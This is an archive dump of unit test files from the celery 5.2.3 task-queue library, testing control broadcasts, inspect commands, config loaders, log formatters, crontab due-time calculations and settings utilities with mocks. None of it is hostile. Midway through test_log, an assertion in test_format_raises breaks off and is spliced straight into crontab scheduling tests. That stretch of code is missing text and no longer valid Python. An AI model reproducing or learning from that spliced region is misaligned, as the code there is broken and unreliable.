assert 'Received multiple replies from node name: {}.'.format( next(iter(reply[0]))) in str(w[0].message.args[0]) assert 'foo@example.com' in nodes assert 'bar@example.com' in nodes class test_inspect: def setup(self): self.app.control.broadcast = Mock(name='broadcast') self.app.control.broadcast.return_value = {} self.inspect = self.app.control.inspect() def test_prepare_reply(self): reply = self.inspect._prepare([ {'w1': {'ok': 1}}, {'w2': {'ok': 1}}, ]) assert reply == { 'w1': {'ok': 1}, 'w2': {'ok': 1}, } i = self.app.control.inspect(destination='w1') assert i._prepare([{'w1': {'ok': 1}}]) == {'ok': 1} def assert_broadcast_called(self, command, destination=None, callback=None, connection=None, limit=None, timeout=None, reply=True, pattern=None, matcher=None, **arguments): self.app.control.broadcast.assert_called_with( command, arguments=arguments, destination=destination or self.inspect.destination, pattern=pattern or self.inspect.pattern, matcher=matcher or self.inspect.destination, callback=callback or self.inspect.callback, connection=connection or self.inspect.connection, limit=limit if limit is not None else self.inspect.limit, timeout=timeout if timeout is not None else self.inspect.timeout, reply=reply, ) def test_active(self): self.inspect.active() self.assert_broadcast_called('active', safe=None) def test_active_safe(self): self.inspect.active(safe=True) self.assert_broadcast_called('active', safe=True) def test_clock(self): self.inspect.clock() self.assert_broadcast_called('clock') def test_conf(self): self.inspect.conf() self.assert_broadcast_called('conf', with_defaults=False) def test_conf__with_defaults(self): self.inspect.conf(with_defaults=True) self.assert_broadcast_called('conf', with_defaults=True) def test_hello(self): self.inspect.hello('george@vandelay.com') self.assert_broadcast_called( 'hello', from_node='george@vandelay.com', revoked=None) def test_hello__with_revoked(self): revoked = LimitedSet(100) for i in range(100): revoked.add(f'id{i}') self.inspect.hello('george@vandelay.com', revoked=revoked._data) self.assert_broadcast_called( 'hello', from_node='george@vandelay.com', revoked=revoked._data) def test_memsample(self): self.inspect.memsample() self.assert_broadcast_called('memsample') def test_memdump(self): self.inspect.memdump() self.assert_broadcast_called('memdump', samples=10) def test_memdump__samples_specified(self): self.inspect.memdump(samples=303) self.assert_broadcast_called('memdump', samples=303) def test_objgraph(self): self.inspect.objgraph() self.assert_broadcast_called( 'objgraph', num=200, type='Request', max_depth=10) def test_scheduled(self): self.inspect.scheduled() self.assert_broadcast_called('scheduled') def test_reserved(self): self.inspect.reserved() self.assert_broadcast_called('reserved') def test_stats(self): self.inspect.stats() self.assert_broadcast_called('stats') def test_revoked(self): self.inspect.revoked() self.assert_broadcast_called('revoked') def test_registered(self): self.inspect.registered() self.assert_broadcast_called('registered', taskinfoitems=()) def test_registered__taskinfoitems(self): self.inspect.registered('rate_limit', 'time_limit') self.assert_broadcast_called( 'registered', taskinfoitems=('rate_limit', 'time_limit'), ) def test_ping(self): self.inspect.ping() self.assert_broadcast_called('ping') def test_ping_matcher_pattern(self): orig_inspect = self.inspect self.inspect = self.app.control.inspect(pattern=".*", matcher="pcre") self.inspect.ping() try: self.assert_broadcast_called('ping', 
pattern=".*", matcher="pcre") except AssertionError as e: self.inspect = orig_inspect raise e def test_active_queues(self): self.inspect.active_queues() self.assert_broadcast_called('active_queues') def test_query_task(self): self.inspect.query_task('foo', 'bar') self.assert_broadcast_called('query_task', ids=('foo', 'bar')) def test_query_task__compat_single_list_argument(self): self.inspect.query_task(['foo', 'bar']) self.assert_broadcast_called('query_task', ids=['foo', 'bar']) def test_query_task__scalar(self): self.inspect.query_task('foo') self.assert_broadcast_called('query_task', ids=('foo',)) def test_report(self): self.inspect.report() self.assert_broadcast_called('report') class test_Control_broadcast: def setup(self): self.app.control.mailbox = Mock(name='mailbox') def test_broadcast(self): self.app.control.broadcast('foobarbaz', arguments={'foo': 2}) self.app.control.mailbox.assert_called() self.app.control.mailbox()._broadcast.assert_called_with( 'foobarbaz', {'foo': 2}, None, False, 1.0, None, None, channel=None, ) def test_broadcast_limit(self): self.app.control.broadcast( 'foobarbaz1', arguments=None, limit=None, destination=[1, 2, 3], ) self.app.control.mailbox.assert_called() self.app.control.mailbox()._broadcast.assert_called_with( 'foobarbaz1', {}, [1, 2, 3], False, 1.0, None, None, channel=None, ) class test_Control: def setup(self): self.app.control.broadcast = Mock(name='broadcast') self.app.control.broadcast.return_value = {} @self.app.task(shared=False) def mytask(): pass self.mytask = mytask def assert_control_called_with_args(self, name, destination=None, _options=None, **args): self.app.control.broadcast.assert_called_with( name, destination=destination, arguments=args, **_options or {}) def test_serializer(self): self.app.conf['task_serializer'] = 'test' self.app.conf['accept_content'] = ['test'] assert control.Control(self.app).mailbox.serializer == 'test' assert control.Control(self.app).mailbox.accept == ['test'] def test_purge(self): self.app.amqp.TaskConsumer = Mock(name='TaskConsumer') self.app.control.purge() self.app.amqp.TaskConsumer().purge.assert_called_with() def test_rate_limit(self): self.app.control.rate_limit(self.mytask.name, '100/m') self.assert_control_called_with_args( 'rate_limit', destination=None, task_name=self.mytask.name, rate_limit='100/m', ) def test_rate_limit__with_destination(self): self.app.control.rate_limit( self.mytask.name, '100/m', 'a@w.com', limit=100) self.assert_control_called_with_args( 'rate_limit', destination='a@w.com', task_name=self.mytask.name, rate_limit='100/m', _options={'limit': 100}, ) def test_time_limit(self): self.app.control.time_limit(self.mytask.name, soft=10, hard=20) self.assert_control_called_with_args( 'time_limit', destination=None, task_name=self.mytask.name, soft=10, hard=20, ) def test_time_limit__with_destination(self): self.app.control.time_limit( self.mytask.name, soft=10, hard=20, destination='a@q.com', limit=99, ) self.assert_control_called_with_args( 'time_limit', destination='a@q.com', task_name=self.mytask.name, soft=10, hard=20, _options={'limit': 99}, ) def test_add_consumer(self): self.app.control.add_consumer('foo') self.assert_control_called_with_args( 'add_consumer', destination=None, queue='foo', exchange=None, exchange_type='direct', routing_key=None, ) def test_add_consumer__with_options_and_dest(self): self.app.control.add_consumer( 'foo', 'ex', 'topic', 'rkey', destination='a@q.com', limit=78) self.assert_control_called_with_args( 'add_consumer', destination='a@q.com', 
queue='foo', exchange='ex', exchange_type='topic', routing_key='rkey', _options={'limit': 78}, ) def test_cancel_consumer(self): self.app.control.cancel_consumer('foo') self.assert_control_called_with_args( 'cancel_consumer', destination=None, queue='foo', ) def test_cancel_consumer__with_destination(self): self.app.control.cancel_consumer( 'foo', destination='w1@q.com', limit=3) self.assert_control_called_with_args( 'cancel_consumer', destination='w1@q.com', queue='foo', _options={'limit': 3}, ) def test_shutdown(self): self.app.control.shutdown() self.assert_control_called_with_args('shutdown', destination=None) def test_shutdown__with_destination(self): self.app.control.shutdown(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'shutdown', destination='a@q.com', _options={'limit': 3}) def test_heartbeat(self): self.app.control.heartbeat() self.assert_control_called_with_args('heartbeat', destination=None) def test_heartbeat__with_destination(self): self.app.control.heartbeat(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'heartbeat', destination='a@q.com', _options={'limit': 3}) def test_pool_restart(self): self.app.control.pool_restart() self.assert_control_called_with_args( 'pool_restart', destination=None, modules=None, reload=False, reloader=None) def test_terminate(self): self.app.control.revoke = Mock(name='revoke') self.app.control.terminate('124') self.app.control.revoke.assert_called_with( '124', destination=None, terminate=True, signal=control.TERM_SIGNAME, ) def test_enable_events(self): self.app.control.enable_events() self.assert_control_called_with_args('enable_events', destination=None) def test_enable_events_with_destination(self): self.app.control.enable_events(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'enable_events', destination='a@q.com', _options={'limit': 3}) def test_disable_events(self): self.app.control.disable_events() self.assert_control_called_with_args( 'disable_events', destination=None) def test_disable_events_with_destination(self): self.app.control.disable_events(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'disable_events', destination='a@q.com', _options={'limit': 3}) def test_ping(self): self.app.control.ping() self.assert_control_called_with_args( 'ping', destination=None, _options={'timeout': 1.0, 'reply': True}) def test_ping_with_destination(self): self.app.control.ping(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'ping', destination='a@q.com', _options={ 'limit': 3, 'timeout': 1.0, 'reply': True, }) def test_revoke(self): self.app.control.revoke('foozbaaz') self.assert_control_called_with_args( 'revoke', destination=None, task_id='foozbaaz', signal=control.TERM_SIGNAME, terminate=False, ) def test_revoke__with_options(self): self.app.control.revoke( 'foozbaaz', destination='a@q.com', terminate=True, signal='KILL', limit=404, ) self.assert_control_called_with_args( 'revoke', destination='a@q.com', task_id='foozbaaz', signal='KILL', terminate=True, _options={'limit': 404}, ) def test_election(self): self.app.control.election('some_id', 'topic', 'action') self.assert_control_called_with_args( 'election', destination=None, topic='topic', action='action', id='some_id', _options={'connection': None}, ) def test_autoscale(self): self.app.control.autoscale(300, 10) self.assert_control_called_with_args( 'autoscale', max=300, min=10, destination=None) def test_autoscale__with_options(self): self.app.control.autoscale(300, 10, 
destination='a@q.com', limit=39) self.assert_control_called_with_args( 'autoscale', max=300, min=10, destination='a@q.com', _options={'limit': 39} ) def test_pool_grow(self): self.app.control.pool_grow(2) self.assert_control_called_with_args( 'pool_grow', n=2, destination=None) def test_pool_grow__with_options(self): self.app.control.pool_grow(2, destination='a@q.com', limit=39) self.assert_control_called_with_args( 'pool_grow', n=2, destination='a@q.com', _options={'limit': 39} ) def test_pool_shrink(self): self.app.control.pool_shrink(2) self.assert_control_called_with_args( 'pool_shrink', n=2, destination=None) def test_pool_shrink__with_options(self): self.app.control.pool_shrink(2, destination='a@q.com', limit=39) self.assert_control_called_with_args( 'pool_shrink', n=2, destination='a@q.com', _options={'limit': 39} ) def test_revoke_from_result(self): self.app.control.revoke = Mock(name='revoke') self.app.AsyncResult('foozbazzbar').revoke() self.app.control.revoke.assert_called_with( 'foozbazzbar', connection=None, reply=False, signal=None, terminate=False, timeout=None) def test_revoke_from_resultset(self): self.app.control.revoke = Mock(name='revoke') uuids = [uuid() for _ in range(10)] r = self.app.GroupResult( uuid(), [self.app.AsyncResult(x) for x in uuids]) r.revoke() self.app.control.revoke.assert_called_with( uuids, connection=None, reply=False, signal=None, terminate=False, timeout=None) def test_after_fork_clears_mailbox_pool(self): amqp = Mock(name='amqp') self.app.amqp = amqp closed_pool = Mock(name='closed pool') amqp.producer_pool = closed_pool assert closed_pool is self.app.control.mailbox.producer_pool self.app.control._after_fork() new_pool = Mock(name='new pool') amqp.producer_pool = new_pool assert new_pool is self.app.control.mailbox.producer_pool def test_control_exchange__default(self): c = control.Control(self.app) assert c.mailbox.namespace == 'celery' def test_control_exchange__setting(self): self.app.conf.control_exchange = 'test_exchange' c = control.Control(self.app) assert c.mailbox.namespace == 'test_exchange' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_defaults.py0000664000175000017500000000313300000000000020117 0ustar00asifasif00000000000000import sys from importlib import import_module from celery.app.defaults import (_OLD_DEFAULTS, _OLD_SETTING_KEYS, _TO_NEW_KEY, _TO_OLD_KEY, DEFAULTS, NAMESPACES, SETTING_KEYS) class test_defaults: def setup(self): self._prev = sys.modules.pop('celery.app.defaults', None) def teardown(self): if self._prev: sys.modules['celery.app.defaults'] = self._prev def test_option_repr(self): assert repr(NAMESPACES['broker']['url']) def test_any(self): val = object() assert self.defaults.Option.typemap['any'](val) is val def test_compat_indices(self): assert not any(key.isupper() for key in DEFAULTS) assert not any(key.islower() for key in _OLD_DEFAULTS) assert not any(key.isupper() for key in _TO_OLD_KEY) assert not any(key.islower() for key in _TO_NEW_KEY) assert not any(key.isupper() for key in SETTING_KEYS) assert not any(key.islower() for key in _OLD_SETTING_KEYS) assert not any(value.isupper() for value in _TO_NEW_KEY.values()) assert not any(value.islower() for value in _TO_OLD_KEY.values()) for key in _TO_NEW_KEY: assert key in _OLD_SETTING_KEYS for key in _TO_OLD_KEY: assert key in SETTING_KEYS def test_find(self): find = self.defaults.find assert find('default_queue')[2].default == 'celery' assert 
find('task_default_exchange')[2] is None

    @property
    def defaults(self):
        return import_module('celery.app.defaults')

celery-5.2.3/t/unit/app/test_exceptions.py

import pickle
from datetime import datetime

from celery.exceptions import Reject, Retry


class test_Retry:

    def test_when_datetime(self):
        x = Retry('foo', KeyError(), when=datetime.utcnow())
        assert x.humanize()

    def test_pickleable(self):
        x = Retry('foo', KeyError(), when=datetime.utcnow())
        y = pickle.loads(pickle.dumps(x))
        assert x.message == y.message
        assert repr(x.exc) == repr(y.exc)
        assert x.when == y.when


class test_Reject:

    def test_attrs(self):
        x = Reject('foo', requeue=True)
        assert x.reason == 'foo'
        assert x.requeue

    def test_repr(self):
        assert repr(Reject('foo', True))

    def test_pickleable(self):
        # Reject instances must also round-trip through pickle.
        x = Reject('foo', True)
        assert pickle.loads(pickle.dumps(x))

celery-5.2.3/t/unit/app/test_loaders.py

import os
import sys
import warnings
from unittest.mock import Mock, patch

import pytest

from celery import loaders
from celery.exceptions import NotConfigured
from celery.loaders import base, default
from celery.loaders.app import AppLoader
from celery.utils.imports import NotAPackage


class DummyLoader(base.BaseLoader):

    def read_configuration(self):
        return {'foo': 'bar', 'imports': ('os', 'sys')}


class test_loaders:

    def test_get_loader_cls(self):
        assert loaders.get_loader_cls('default') is default.Loader


class test_LoaderBase:
    message_options = {'subject': 'Subject',
                       'body': 'Body',
                       'sender': 'x@x.com',
                       'to': 'y@x.com'}
    server_options = {'host': 'smtp.x.com',
                      'port': 1234,
                      'user': 'x',
                      'password': 'qwerty',
                      'timeout': 3}

    def setup(self):
        self.loader = DummyLoader(app=self.app)

    def test_handlers_pass(self):
        self.loader.on_task_init('foo.task', 'feedface-cafebabe')
        self.loader.on_worker_init()

    def test_now(self):
        assert self.loader.now(utc=True)
        assert self.loader.now(utc=False)

    def test_read_configuration_no_env(self):
        assert base.BaseLoader(app=self.app).read_configuration(
            'FOO_X_S_WE_WQ_Q_WE') is None

    def test_autodiscovery(self):
        with patch('celery.loaders.base.autodiscover_tasks') as auto:
            auto.return_value = [Mock()]
            auto.return_value[0].__name__ = 'moo'
            self.loader.autodiscover_tasks(['A', 'B'])
            assert 'moo' in self.loader.task_modules
            self.loader.task_modules.discard('moo')

    def test_import_task_module(self):
        assert sys == self.loader.import_task_module('sys')

    def test_init_worker_process(self):
        self.loader.on_worker_process_init()
        m = self.loader.on_worker_process_init = Mock()
        self.loader.init_worker_process()
        m.assert_called_with()

    def test_config_from_object_module(self):
        self.loader.import_from_cwd = Mock(return_value={
            "override_backends": {"db": "custom.backend.module"},
        })
        self.loader.config_from_object('module_name')
        self.loader.import_from_cwd.assert_called_with('module_name')
        assert self.loader.override_backends == {"db": "custom.backend.module"}

    def test_conf_property(self):
        assert self.loader.conf['foo'] == 'bar'
        assert self.loader._conf['foo'] == 'bar'
        assert self.loader.conf['foo'] == 'bar'

    def test_import_default_modules(self):
        def modnames(l):
            return [m.__name__ for m in l]
        self.app.conf.imports = ('os', 'sys')
        assert (sorted(modnames(self.loader.import_default_modules())) ==
                sorted(modnames([os, sys])))

    def test_import_default_modules_with_exception(self):
        """Make sure exceptions are not silenced since this step
        is prior to setup logging."""
        def trigger_exception(**kwargs):
            raise ImportError('Dummy ImportError')
        from celery.signals import import_modules
        x = import_modules.connect(trigger_exception)
        self.app.conf.imports = ('os', 'sys')
        with pytest.raises(ImportError):
            self.loader.import_default_modules()
        import_modules.disconnect(x)

    def test_import_from_cwd_custom_imp(self):
        imp = Mock(name='imp')
        self.loader.import_from_cwd('foo', imp=imp)
        imp.assert_called()

    def test_cmdline_config_ValueError(self):
        with pytest.raises(ValueError):
            self.loader.cmdline_config_parser(['broker.port=foobar'])


class test_DefaultLoader:

    @patch('celery.loaders.base.find_module')
    def test_read_configuration_not_a_package(self, find_module):
        find_module.side_effect = NotAPackage()
        l = default.Loader(app=self.app)
        with pytest.raises(NotAPackage):
            l.read_configuration(fail_silently=False)

    @patch('celery.loaders.base.find_module')
    @pytest.mark.patched_environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
    def test_read_configuration_py_in_name(self, find_module, environ):
        find_module.side_effect = NotAPackage()
        l = default.Loader(app=self.app)
        with pytest.raises(NotAPackage):
            l.read_configuration(fail_silently=False)

    @patch('celery.loaders.base.find_module')
    def test_read_configuration_importerror(self, find_module):
        default.C_WNOCONF = True
        find_module.side_effect = ImportError()
        l = default.Loader(app=self.app)
        with pytest.warns(NotConfigured):
            l.read_configuration(fail_silently=True)
        default.C_WNOCONF = False
        l.read_configuration(fail_silently=True)

    def test_read_configuration(self):
        from types import ModuleType

        class ConfigModule(ModuleType):
            pass

        configname = os.environ.get('CELERY_CONFIG_MODULE') or 'celeryconfig'
        celeryconfig = ConfigModule(configname)
        celeryconfig.imports = ('os', 'sys')

        prevconfig = sys.modules.get(configname)
        sys.modules[configname] = celeryconfig
        try:
            l = default.Loader(app=self.app)
            l.find_module = Mock(name='find_module')
            settings = l.read_configuration(fail_silently=False)
            assert settings.imports == ('os', 'sys')
            settings = l.read_configuration(fail_silently=False)
            assert settings.imports == ('os', 'sys')
            l.on_worker_init()
        finally:
            if prevconfig:
                sys.modules[configname] = prevconfig

    def test_read_configuration_ImportError(self):
        sentinel = object()
        prev, os.environ['CELERY_CONFIG_MODULE'] = (
            os.environ.get('CELERY_CONFIG_MODULE', sentinel),
            'daweqew.dweqw',
        )
        try:
            l = default.Loader(app=self.app)
            with pytest.raises(ImportError):
                l.read_configuration(fail_silently=False)
            l.read_configuration(fail_silently=True)
        finally:
            if prev is not sentinel:
                os.environ['CELERY_CONFIG_MODULE'] = prev
            else:
                os.environ.pop('CELERY_CONFIG_MODULE', None)

    def test_import_from_cwd(self):
        l = default.Loader(app=self.app)
        old_path = list(sys.path)
        try:
            sys.path.remove(os.getcwd())
        except ValueError:
            pass
        celery = sys.modules.pop('celery', None)
        sys.modules.pop('celery.local', None)
        try:
            assert l.import_from_cwd('celery')
            sys.modules.pop('celery', None)
            sys.modules.pop('celery.local', None)
            sys.path.insert(0, os.getcwd())
            assert l.import_from_cwd('celery')
        finally:
            sys.path = old_path
            sys.modules['celery'] = celery

    def test_unconfigured_settings(self):
        context_executed = [False]

        class _Loader(default.Loader):

            def find_module(self, name):
                raise ImportError(name)

        with warnings.catch_warnings(record=True):
            l = _Loader(app=self.app)
            assert not l.configured
            context_executed[0] = True
        assert context_executed[0]


class test_AppLoader:

    def setup(self):
        self.loader = AppLoader(app=self.app)

    def test_on_worker_init(self):
        self.app.conf.imports = ('subprocess',)
        sys.modules.pop('subprocess', None)
        self.loader.init_worker()
        assert 'subprocess' in sys.modules


class test_autodiscovery:

    def test_autodiscover_tasks(self):
        base._RACE_PROTECTION = True
        try:
            base.autodiscover_tasks(['foo'])
        finally:
            base._RACE_PROTECTION = False
        with patch('celery.loaders.base.find_related_module') as frm:
            base.autodiscover_tasks(['foo'])
            frm.assert_called()

    def test_find_related_module(self):
        with patch('importlib.import_module') as imp:
            imp.return_value = Mock()
            imp.return_value.__path__ = 'foo'
            assert base.find_related_module('bar', 'tasks').__path__ == 'foo'
            imp.assert_any_call('bar')
            imp.assert_any_call('bar.tasks')

            imp.reset_mock()
            assert base.find_related_module('bar', None).__path__ == 'foo'
            imp.assert_called_once_with('bar')

            imp.side_effect = ImportError()
            with pytest.raises(ImportError):
                base.find_related_module('bar', 'tasks')
            assert base.find_related_module('bar.foo', 'tasks') is None

celery-5.2.3/t/unit/app/test_log.py

import logging
import sys
from collections import defaultdict
from io import StringIO
from tempfile import mktemp
from unittest.mock import Mock, patch

import pytest

from celery import signals, uuid
from celery.app.log import TaskFormatter
from celery.utils.log import (ColorFormatter, LoggingProxy, get_logger,
                              get_task_logger, in_sighandler)
from celery.utils.log import logger as base_logger
from celery.utils.log import logger_isa, task_logger
from t.unit import conftest


class test_TaskFormatter:

    def test_no_task(self):
        class Record:
            msg = 'hello world'
            levelname = 'info'
            exc_text = exc_info = None
            stack_info = None

            def getMessage(self):
                return self.msg
        record = Record()
        x = TaskFormatter()
        x.format(record)
        assert record.task_name == '???'
        assert record.task_id == '???'
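

# --- Editor's illustrative sketch, not part of the original celery test suite. ---
# test_no_task above shows that TaskFormatter substitutes '???' for the task
# name and id when no task is bound to the log record.  The hypothetical helper
# below is a minimal usage example built only from names already imported in
# this module (logging, TaskFormatter); it sketches typical wiring, it is not
# celery's own setup code.
def _taskformatter_usage_sketch():
    handler = logging.StreamHandler()
    # task_name/task_id are the format keys the assertions above rely on.
    handler.setFormatter(TaskFormatter(
        '[%(levelname)s] %(task_name)s(%(task_id)s): %(message)s'))
    sketch_logger = logging.getLogger('taskformatter.sketch')
    sketch_logger.addHandler(handler)
    # Outside of a running task both placeholders render as '???'.
    sketch_logger.warning('hello from outside a task')

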
class test_logger_isa: def test_isa(self): x = get_task_logger('Z1george') assert logger_isa(x, task_logger) prev_x, x.parent = x.parent, None try: assert not logger_isa(x, task_logger) finally: x.parent = prev_x y = get_task_logger('Z1elaine') y.parent = x assert logger_isa(y, task_logger) assert logger_isa(y, x) assert logger_isa(y, y) z = get_task_logger('Z1jerry') z.parent = y assert logger_isa(z, task_logger) assert logger_isa(z, y) assert logger_isa(z, x) assert logger_isa(z, z) def test_recursive(self): x = get_task_logger('X1foo') prev, x.parent = x.parent, x try: with pytest.raises(RuntimeError): logger_isa(x, task_logger) finally: x.parent = prev y = get_task_logger('X2foo') z = get_task_logger('X2foo') prev_y, y.parent = y.parent, z try: prev_z, z.parent = z.parent, y try: with pytest.raises(RuntimeError): logger_isa(y, task_logger) finally: z.parent = prev_z finally: y.parent = prev_y class test_ColorFormatter: @patch('celery.utils.log.safe_str') @patch('logging.Formatter.formatException') def test_formatException_not_string(self, fe, safe_str): x = ColorFormatter() value = KeyError() fe.return_value = value assert x.formatException(value) is value fe.assert_called() safe_str.assert_not_called() @patch('logging.Formatter.formatException') @patch('celery.utils.log.safe_str') def test_formatException_bytes(self, safe_str, fe): x = ColorFormatter() fe.return_value = b'HELLO' try: raise Exception() except Exception: assert x.formatException(sys.exc_info()) @patch('logging.Formatter.format') def test_format_object(self, _format): x = ColorFormatter() x.use_color = True record = Mock() record.levelname = 'ERROR' record.msg = object() assert x.format(record) @patch('celery.utils.log.safe_str') def test_format_raises(self, safe_str): x = ColorFormatter() def on_safe_str(s): try: raise ValueError('foo') finally: safe_str.side_effect = None safe_str.side_effect = on_safe_str class Record: levelname = 'ERROR' msg = 'HELLO' exc_info = 1 exc_text = 'error text' stack_info = None def __str__(self): return on_safe_str('') def getMessage(self): return self.msg record = Record() safe_str.return_value = record msg = x.format(record) assert '= 3: raise else: break def test_every_minute_execution_is_due(self): last_ran = self.now - timedelta(seconds=61) due, remaining = self.every_minute.is_due(last_ran) self.assert_relativedelta(self.every_minute, last_ran) assert due self.seconds_almost_equal(remaining, self.next_minute, 1) def assert_relativedelta(self, due, last_ran): try: from dateutil.relativedelta import relativedelta except ImportError: return l1, d1, n1 = due.remaining_delta(last_ran) l2, d2, n2 = due.remaining_delta(last_ran, ffwd=relativedelta) if not isinstance(d1, relativedelta): assert l1 == l2 for field, value in d1._fields().items(): assert getattr(d1, field) == value assert not d2.years assert not d2.months assert not d2.days assert not d2.leapdays assert not d2.hours assert not d2.minutes assert not d2.seconds assert not d2.microseconds def test_every_minute_execution_is_not_due(self): last_ran = self.now - timedelta(seconds=self.now.second) due, remaining = self.every_minute.is_due(last_ran) assert not due self.seconds_almost_equal(remaining, self.next_minute, 1) def test_execution_is_due_on_saturday(self): # 29th of May 2010 is a saturday with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 29, 10, 30)): last_ran = self.now - timedelta(seconds=61) due, remaining = self.every_minute.is_due(last_ran) assert due self.seconds_almost_equal(remaining, self.next_minute, 1) def 
test_execution_is_due_on_sunday(self): # 30th of May 2010 is a sunday with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 30, 10, 30)): last_ran = self.now - timedelta(seconds=61) due, remaining = self.every_minute.is_due(last_ran) assert due self.seconds_almost_equal(remaining, self.next_minute, 1) def test_execution_is_due_on_monday(self): # 31st of May 2010 is a monday with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 31, 10, 30)): last_ran = self.now - timedelta(seconds=61) due, remaining = self.every_minute.is_due(last_ran) assert due self.seconds_almost_equal(remaining, self.next_minute, 1) def test_every_hour_execution_is_due(self): with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 10, 10, 30)): due, remaining = self.hourly.is_due(datetime(2010, 5, 10, 6, 30)) assert due assert remaining == 60 * 60 def test_every_hour_execution_is_not_due(self): with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 10, 10, 29)): due, remaining = self.hourly.is_due(datetime(2010, 5, 10, 9, 30)) assert not due assert remaining == 60 def test_first_quarter_execution_is_due(self): with patch_crontab_nowfun( self.quarterly, datetime(2010, 5, 10, 10, 15)): due, remaining = self.quarterly.is_due( datetime(2010, 5, 10, 6, 30), ) assert due assert remaining == 15 * 60 def test_second_quarter_execution_is_due(self): with patch_crontab_nowfun( self.quarterly, datetime(2010, 5, 10, 10, 30)): due, remaining = self.quarterly.is_due( datetime(2010, 5, 10, 6, 30), ) assert due assert remaining == 15 * 60 def test_first_quarter_execution_is_not_due(self): with patch_crontab_nowfun( self.quarterly, datetime(2010, 5, 10, 10, 14)): due, remaining = self.quarterly.is_due( datetime(2010, 5, 10, 10, 0), ) assert not due assert remaining == 60 def test_second_quarter_execution_is_not_due(self): with patch_crontab_nowfun( self.quarterly, datetime(2010, 5, 10, 10, 29)): due, remaining = self.quarterly.is_due( datetime(2010, 5, 10, 10, 15), ) assert not due assert remaining == 60 def test_daily_execution_is_due(self): with patch_crontab_nowfun(self.daily, datetime(2010, 5, 10, 7, 30)): due, remaining = self.daily.is_due(datetime(2010, 5, 9, 7, 30)) assert due assert remaining == 24 * 60 * 60 def test_daily_execution_is_not_due(self): with patch_crontab_nowfun(self.daily, datetime(2010, 5, 10, 10, 30)): due, remaining = self.daily.is_due(datetime(2010, 5, 10, 7, 30)) assert not due assert remaining == 21 * 60 * 60 def test_weekly_execution_is_due(self): with patch_crontab_nowfun(self.weekly, datetime(2010, 5, 6, 7, 30)): due, remaining = self.weekly.is_due(datetime(2010, 4, 30, 7, 30)) assert due assert remaining == 7 * 24 * 60 * 60 def test_weekly_execution_is_not_due(self): with patch_crontab_nowfun(self.weekly, datetime(2010, 5, 7, 10, 30)): due, remaining = self.weekly.is_due(datetime(2010, 5, 6, 7, 30)) assert not due assert remaining == 6 * 24 * 60 * 60 - 3 * 60 * 60 def test_monthly_execution_is_due(self): with patch_crontab_nowfun(self.monthly, datetime(2010, 5, 13, 7, 30)): due, remaining = self.monthly.is_due(datetime(2010, 4, 8, 7, 30)) assert due assert remaining == 28 * 24 * 60 * 60 def test_monthly_execution_is_not_due(self): with patch_crontab_nowfun(self.monthly, datetime(2010, 5, 9, 10, 30)): due, remaining = self.monthly.is_due(datetime(2010, 4, 8, 7, 30)) assert not due assert remaining == 4 * 24 * 60 * 60 - 3 * 60 * 60 def test_monthly_moy_execution_is_due(self): with patch_crontab_nowfun( self.monthly_moy, datetime(2014, 2, 26, 22, 0)): due, remaining = self.monthly_moy.is_due( 
datetime(2013, 7, 4, 10, 0), ) assert due assert remaining == 60.0 @pytest.mark.skip('TODO: unstable test') def test_monthly_moy_execution_is_not_due(self): with patch_crontab_nowfun( self.monthly_moy, datetime(2013, 6, 28, 14, 30)): due, remaining = self.monthly_moy.is_due( datetime(2013, 6, 28, 22, 14), ) assert not due attempt = ( time.mktime(datetime(2014, 2, 26, 22, 0).timetuple()) - time.mktime(datetime(2013, 6, 28, 14, 30).timetuple()) - 60 * 60 ) assert remaining == attempt def test_monthly_moy_execution_is_due2(self): with patch_crontab_nowfun( self.monthly_moy, datetime(2014, 2, 26, 22, 0)): due, remaining = self.monthly_moy.is_due( datetime(2013, 2, 28, 10, 0), ) assert due assert remaining == 60.0 def test_monthly_moy_execution_is_not_due2(self): with patch_crontab_nowfun( self.monthly_moy, datetime(2014, 2, 26, 21, 0)): due, remaining = self.monthly_moy.is_due( datetime(2013, 6, 28, 22, 14), ) assert not due attempt = 60 * 60 assert remaining == attempt def test_yearly_execution_is_due(self): with patch_crontab_nowfun(self.yearly, datetime(2010, 3, 11, 7, 30)): due, remaining = self.yearly.is_due(datetime(2009, 3, 12, 7, 30)) assert due assert remaining == 364 * 24 * 60 * 60 def test_yearly_execution_is_not_due(self): with patch_crontab_nowfun(self.yearly, datetime(2010, 3, 7, 10, 30)): due, remaining = self.yearly.is_due(datetime(2009, 3, 12, 7, 30)) assert not due assert remaining == 4 * 24 * 60 * 60 - 3 * 60 * 60 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_utils.py0000664000175000017500000000337600000000000017461 0ustar00asifasif00000000000000from collections.abc import Mapping, MutableMapping from unittest.mock import Mock from celery.app.utils import Settings, bugreport, filter_hidden_settings class test_Settings: def test_is_mapping(self): """Settings should be a collections.Mapping""" assert issubclass(Settings, Mapping) def test_is_mutable_mapping(self): """Settings should be a collections.MutableMapping""" assert issubclass(Settings, MutableMapping) def test_find(self): assert self.app.conf.find_option('always_eager') def test_get_by_parts(self): self.app.conf.task_do_this_and_that = 303 assert self.app.conf.get_by_parts( 'task', 'do', 'this', 'and', 'that') == 303 def test_find_value_for_key(self): assert self.app.conf.find_value_for_key( 'always_eager') is False def test_table(self): assert self.app.conf.table(with_defaults=True) assert self.app.conf.table(with_defaults=False) assert self.app.conf.table(censored=False) assert self.app.conf.table(censored=True) class test_filter_hidden_settings: def test_handles_non_string_keys(self): """filter_hidden_settings shouldn't raise an exception when handling mappings with non-string keys""" conf = { 'STRING_KEY': 'VALUE1', ('NON', 'STRING', 'KEY'): 'VALUE2', 'STRING_KEY2': { 'STRING_KEY3': 1, ('NON', 'STRING', 'KEY', '2'): 2 }, } filter_hidden_settings(conf) class test_bugreport: def test_no_conn_driver_info(self): self.app.connection = Mock() conn = self.app.connection.return_value = Mock() conn.transport = None 